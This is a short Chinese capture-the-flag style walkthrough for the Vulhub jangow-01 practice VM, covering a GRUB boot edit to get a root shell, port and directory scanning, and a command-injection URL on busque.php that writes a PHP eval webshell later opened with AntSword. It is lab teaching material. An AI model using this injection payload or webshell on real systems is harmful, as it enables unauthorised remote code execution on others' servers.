Vulhub-jangow-01-1.0.1通关攻略

第0步:

打开靶机,按下shift,出现下图界面

在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠

第一步:确定靶机IP为192.168.179.129
第二步:扫描后台及开放端口
第三步:进行敏感目录及文件扫描
复制代码
#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190) 
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190) 

#端口
192.168.179.129:80
192.168.179.129:21
第四步:访问扫描出来的可能有价值的文件及端口
第五步:发现可以传参的地方,尝试传一个id,得到结果
第六步:进一步,尝试上传一句话木马
复制代码
#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php
第七步:使用蚁剑进行连接
复制代码
#URL地址
http://192.168.179.129/site/shell.php

FROM IYU_

相关推荐
网安加云课堂5 小时前
课程分享 | 软件供应链安全的系统工程
计算机网络·安全·网络安全
小锋学长生活大爆炸6 小时前
【安全】记录钓鱼邮件中木马病毒的分析溯源
安全
Sʜᴀᴅᴏᴡ . ₪3366 小时前
未授权rce漏洞
服务器·安全
网络抓包与爬虫8 小时前
如何在Android studio用flutter开发app
websocket·网络协议·tcp/ip·http·网络安全·https·udp
色的归属感8 小时前
android studio 安装flutter插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Neolock8 小时前
Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927) 复现利用与原理分析
网络·web安全·中间件·cve·next.js
vortex510 小时前
如何为 Debian 和 Kali 系统更换软件源并更新系统
linux·运维·网络·网络安全·渗透测试·debian·kali
棱镜七彩11 小时前
棱镜七彩受邀出席“供应链安全国家标准贯标应用深度行”活动并做主题分享
安全·国家标准·软件供应链·软件供应链安全
予安灵13 小时前
《白帽子讲 Web 安全》之跨站请求伪造
网络·安全·web安全·网络安全·csrf·跨站请求伪造
网络抓包与爬虫14 小时前
android应用崩溃了,通过崩溃手机连接电脑查找日志方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp